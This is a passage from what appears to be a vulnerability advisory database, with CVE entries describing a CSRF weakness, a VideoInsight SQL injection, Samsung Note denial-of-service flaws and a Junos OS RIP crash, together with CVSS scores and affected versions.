*5. Vulnerable to Cross-Site Request Forgery* There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. +++++
VAR-201702-0672 CVE-2017-5151 VideoInsight Web Client SQL injection vulnerability CVSS V2: 7.5
CVSS V3: 7.3
Severity: HIGH
An issue was discovered in VideoInsight Web Client Version 6.3.5.11 and previous versions. A SQL Injection vulnerability has been identified, which may allow remote code execution. VideoInsight Web Client is a web-based client from VideoInsight, USA. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database
VAR-201701-0789 CVE-2017-5350 Samsung Note device software systemUI crash vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Samsung Note devices with L(5.0/5.1), M(6.0), and N(7.0) software allow attackers to crash systemUI by leveraging incomplete exception handling. The Samsung ID is SVE-2016-7122. Samsung Note is a smartphone released by Samsung in South Korea. The Samsung Note device fails to handle exceptions correctly, allowing remote attackers to exploit the vulnerability via a malicious application to trigger systemUI crashes and a denial of service. Multiple Samsung Android Mobile devices are prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the system, resulting in denial-of-service conditions
VAR-201701-0790 CVE-2017-5351 Samsung Note device software system crash vulnerability CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Samsung Note devices with KK(4.4), L(5.0/5.1), and M(6.0) software allow attackers to crash the system by creating an arbitrarily large number of active VR service threads. The Samsung ID is SVE-2016-7650. Samsung Note device software contains a vulnerability that can cause a system crash. Samsung Note is a smartphone released by South Korea's Samsung. Multiple Samsung Android Mobile devices are prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the system, resulting in denial-of-service conditions
VAR-201705-3367 CVE-2017-2303 Junos OS on Juniper Networks products and platforms data processing vulnerability CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
On Juniper Networks products or platforms running Junos OS 12.1X46 prior to 12.1X46-D50, 12.1X47 prior to 12.1X47-D40, 12.3 prior to 12.3R13, 12.3X48 prior to 12.3X48-D30, 13.2X51 prior to 13.2X51-D40, 13.3 prior to 13.3R10, 14.1 prior to 14.1R8, 14.1X53 prior to 14.1X53-D35, 14.1X55 prior to 14.1X55-D35, 14.2 prior to 14.2R5, 15.1 prior to 15.1F6 or 15.1R3, 15.1X49 prior to 15.1X49-D30 or 15.1X49-D40, 15.1X53 prior to 15.1X53-D35, and where RIP is enabled, certain RIP advertisements received by the router may cause the RPD daemon to crash resulting in a denial of service condition. Junos OS running on Juniper Networks products and platforms contains a data processing vulnerability. Service operation may be interrupted (DoS). Juniper Junos is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash and restart the affected device, denying service to legitimate users. Juniper Junos OS is the network operating system of Juniper Networks, dedicated to the company's hardware systems. The operating system provides a secure programming interface and the Junos SDK